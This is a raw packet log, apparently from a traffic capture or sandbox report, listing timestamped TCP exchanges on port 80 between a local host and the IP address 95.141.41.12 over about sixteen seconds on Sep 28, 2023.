                                                                                              Sep 28, 2023 06:04:51.348762035 CEST5030580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:51.450809956 CEST5030580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:51.451024055 CEST5030780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:51.647555113 CEST805030595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:51.647862911 CEST5030580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:51.647895098 CEST805030795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:51.648085117 CEST5030780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:51.648282051 CEST5030780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:51.845232964 CEST805030795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:51.851526022 CEST805030795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:51.851630926 CEST5030780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:51.950917006 CEST5030780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:51.951287031 CEST5030880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:52.139046907 CEST805030895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:52.139267921 CEST5030880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:52.139349937 CEST5030880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:52.147964001 CEST805030795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:52.148161888 CEST5030780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:52.326555014 CEST805030895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:52.331540108 CEST805030895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:52.331852913 CEST5030880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:52.435103893 CEST5030880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:52.435472012 CEST5030980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:52.622958899 CEST805030895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:52.623259068 CEST5030880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:52.632728100 CEST805030995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:52.632941961 CEST5030980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:52.633053064 CEST5030980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:52.830575943 CEST805030995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:52.836379051 CEST805030995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:52.836452961 CEST5030980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:52.935617924 CEST5030980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:52.935978889 CEST5031180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:53.133167028 CEST805031195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:53.133229017 CEST805030995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:53.133390903 CEST5030980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:53.133747101 CEST5031180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:53.133747101 CEST5031180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:53.331145048 CEST805031195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:53.335608006 CEST805031195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:53.335880041 CEST5031180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:53.435578108 CEST5031180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:53.435846090 CEST5031280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:53.619904041 CEST805031295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:53.620121002 CEST5031280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:53.620204926 CEST5031280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:53.632633924 CEST805031195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:53.632863045 CEST5031180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:53.804263115 CEST805031295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:53.808695078 CEST805031295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:53.808916092 CEST5031280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:53.906189919 CEST5031280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:53.906544924 CEST5031380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:54.090630054 CEST805031295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:54.090907097 CEST5031280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:54.107291937 CEST805031395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:54.107363939 CEST5031380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:54.107528925 CEST5031380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:54.308010101 CEST805031395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:54.312364101 CEST805031395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:54.312510014 CEST5031380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:54.403907061 CEST5031380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:54.404365063 CEST5031580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:54.602411032 CEST805031595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:54.602607012 CEST5031580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:54.602766037 CEST5031580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:54.604394913 CEST805031395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:54.604562998 CEST5031380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:54.800616026 CEST805031595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:54.804971933 CEST805031595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:54.805149078 CEST5031580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:54.903863907 CEST5031580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:54.904308081 CEST5031680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:55.091527939 CEST805031695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:55.091705084 CEST5031680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:55.091813087 CEST5031680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:55.101816893 CEST805031595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:55.101912975 CEST5031580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:55.279594898 CEST805031695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:55.284178019 CEST805031695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:55.284532070 CEST5031680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:55.372862101 CEST5031680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:55.373301029 CEST5031780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:55.560030937 CEST805031695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:55.560245037 CEST5031680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:55.560704947 CEST805031795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:55.560916901 CEST5031780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:55.561002016 CEST5031780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:55.748465061 CEST805031795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:55.752895117 CEST805031795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:55.753079891 CEST5031780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:55.841451883 CEST5031780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:55.844108105 CEST5031980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.028753042 CEST805031995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:56.028979063 CEST5031980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.029310942 CEST5031980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.029495001 CEST805031795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:56.029670954 CEST5031780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.213767052 CEST805031995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:56.221133947 CEST805031995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:56.221415997 CEST5031980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.310245037 CEST5031980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.311372042 CEST5032080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.495107889 CEST805031995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:56.495323896 CEST5031980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.507745981 CEST805032095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:56.508060932 CEST5032080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.508163929 CEST5032080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.705730915 CEST805032095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:56.707427025 CEST805032095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:56.707590103 CEST5032080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.794344902 CEST5032080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.794750929 CEST5032180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.979866982 CEST805032195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:56.979969978 CEST5032180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.980299950 CEST5032180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:56.990885019 CEST805032095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:56.991151094 CEST5032080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:57.164974928 CEST805032195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:57.170166016 CEST805032195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:57.170258999 CEST5032180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:57.263231993 CEST5032180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:57.263461113 CEST5032380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:57.448999882 CEST805032195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:57.449373960 CEST5032180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:57.451307058 CEST805032395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:57.451504946 CEST5032380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:57.451596975 CEST5032380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:57.638936996 CEST805032395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:57.644593954 CEST805032395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:57.644895077 CEST5032380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:57.733330011 CEST5032380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:57.733839035 CEST5032480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:57.921088934 CEST805032395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:57.921288967 CEST5032380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:57.933415890 CEST805032495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:57.933589935 CEST5032480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:57.933793068 CEST5032480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:58.133371115 CEST805032495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:58.136239052 CEST805032495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:58.136496067 CEST5032480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:58.232198954 CEST5032480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:58.232613087 CEST5032580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:58.426955938 CEST805032595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:58.427062988 CEST5032580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:58.427254915 CEST5032580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:58.432080984 CEST805032495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:58.432305098 CEST5032480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:58.622064114 CEST805032595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:58.623131990 CEST805032595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:58.623262882 CEST5032580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:58.729988098 CEST5032580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:58.730624914 CEST5032680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:58.918812990 CEST805032695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:58.919131994 CEST5032680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:58.919276953 CEST5032680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:58.924391985 CEST805032595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:58.924562931 CEST5032580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:59.107649088 CEST805032695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:59.115701914 CEST805032695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:59.115776062 CEST5032680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:59.216413975 CEST5032680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:59.216869116 CEST5032880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:59.404970884 CEST805032695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:59.405261040 CEST5032680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:59.409709930 CEST805032895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:59.409935951 CEST5032880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:59.410105944 CEST5032880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:59.603344917 CEST805032895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:59.607554913 CEST805032895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:59.607908010 CEST5032880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:59.700762987 CEST5032880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:59.701064110 CEST5032980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:59.893929005 CEST805032895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:59.894007921 CEST5032880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:59.905760050 CEST805032995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:59.905953884 CEST5032980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:59.906055927 CEST5032980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:00.110878944 CEST805032995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:00.115648031 CEST805032995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:00.115966082 CEST5032980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:00.216521978 CEST5032980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:00.216713905 CEST5033080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:00.412720919 CEST805033095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:00.412899971 CEST5033080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:00.413094997 CEST5033080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:00.421396017 CEST805032995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:00.421576977 CEST5032980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:00.609131098 CEST805033095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:00.613894939 CEST805033095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:00.614083052 CEST5033080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:00.700839043 CEST5033080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:00.701212883 CEST5033280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:00.888179064 CEST805033295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:00.888309002 CEST5033280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:00.888618946 CEST5033280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:00.897221088 CEST805033095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:00.897294044 CEST5033080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:01.076088905 CEST805033295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:01.082246065 CEST805033295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:01.082623005 CEST5033280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:01.169943094 CEST5033280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:01.170485020 CEST5033380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:01.356925964 CEST805033295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:01.357109070 CEST5033280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:01.364042044 CEST805033395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:01.364310026 CEST5033380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:01.364639044 CEST5033380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:01.558541059 CEST805033395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:01.559844017 CEST805033395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:01.560125113 CEST5033380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:01.654064894 CEST5033380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:01.654386997 CEST5033480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:01.844949961 CEST805033495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:01.845236063 CEST5033480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:01.845313072 CEST5033480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:01.847676039 CEST805033395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:01.847762108 CEST5033380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:02.035729885 CEST805033495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:02.037111044 CEST805033495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:02.037252903 CEST5033480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:02.122773886 CEST5033480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:02.123150110 CEST5033680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:02.313410997 CEST805033495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:02.313597918 CEST5033480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:02.328164101 CEST805033695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:02.328253984 CEST5033680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:02.328470945 CEST5033680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:02.533782005 CEST805033695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:02.535161018 CEST805033695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:02.535233974 CEST5033680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:02.623162031 CEST5033680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:02.623708010 CEST5033780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:02.811222076 CEST805033795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:02.811602116 CEST5033780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:02.828351021 CEST805033695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:02.828680992 CEST5033680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:02.908453941 CEST5033780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:03.095980883 CEST805033795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:03.097210884 CEST805033795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:03.097387075 CEST5033780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:03.185841084 CEST5033780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:03.186070919 CEST5033880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:03.373256922 CEST805033795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:03.373446941 CEST5033780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:03.391455889 CEST805033895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:03.391663074 CEST5033880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:03.462937117 CEST5033880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:03.668337107 CEST805033895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:03.673352003 CEST805033895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:03.673517942 CEST5033880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:03.763504028 CEST5033880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:03.764009953 CEST5034080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:03.960889101 CEST805034095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:03.961316109 CEST5034080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:03.961316109 CEST5034080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:03.969547033 CEST805033895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:03.969727039 CEST5033880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:04.157898903 CEST805034095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:04.164271116 CEST805034095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:04.164616108 CEST5034080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:04.247675896 CEST5034080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:04.248328924 CEST5034180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:04.436044931 CEST805034195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:04.436290979 CEST5034180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:04.436472893 CEST5034180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:04.444262028 CEST805034095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:04.444554090 CEST5034080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:04.625607967 CEST805034195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:04.630086899 CEST805034195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:04.630234957 CEST5034180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:04.716007948 CEST5034180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:04.716479063 CEST5034280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:04.903759003 CEST805034195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:04.903975010 CEST5034180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:04.912468910 CEST805034295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:04.912750006 CEST5034280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:04.912846088 CEST5034280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:05.109010935 CEST805034295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:05.114547014 CEST805034295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:05.114805937 CEST5034280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:05.200926065 CEST5034280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:05.201112032 CEST5034480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:05.398427010 CEST805034295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:05.398727894 CEST5034280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:05.405541897 CEST805034495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:05.405644894 CEST5034480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:05.405817032 CEST5034480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:05.609824896 CEST805034495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:05.614609003 CEST805034495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:05.614773989 CEST5034480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:05.700726032 CEST5034480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:05.701261044 CEST5034580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:05.895771027 CEST805034595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:05.896030903 CEST5034580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:05.896342993 CEST5034580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:05.904939890 CEST805034495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:05.905121088 CEST5034480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:06.090128899 CEST805034595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:06.091195107 CEST805034595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:06.091255903 CEST5034580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:06.185337067 CEST5034580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:06.185831070 CEST5034680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:06.370924950 CEST805034695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:06.371289015 CEST5034680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:06.371575117 CEST5034680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:06.378803015 CEST805034595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:06.379081011 CEST5034580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:06.556160927 CEST805034695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:06.561403990 CEST805034695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:06.561664104 CEST5034680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:06.657908916 CEST5034680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:06.658214092 CEST5034880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:06.841938972 CEST805034695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:06.842289925 CEST5034680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:06.858695030 CEST805034895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:06.858964920 CEST5034880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:06.859090090 CEST5034880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:07.059341908 CEST805034895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:07.064208984 CEST805034895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:07.064466000 CEST5034880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:07.154020071 CEST5034880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:07.154320955 CEST5034980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:07.351196051 CEST805034995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:07.351421118 CEST5034980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:07.351593018 CEST5034980192.168.2.395.141.41.12
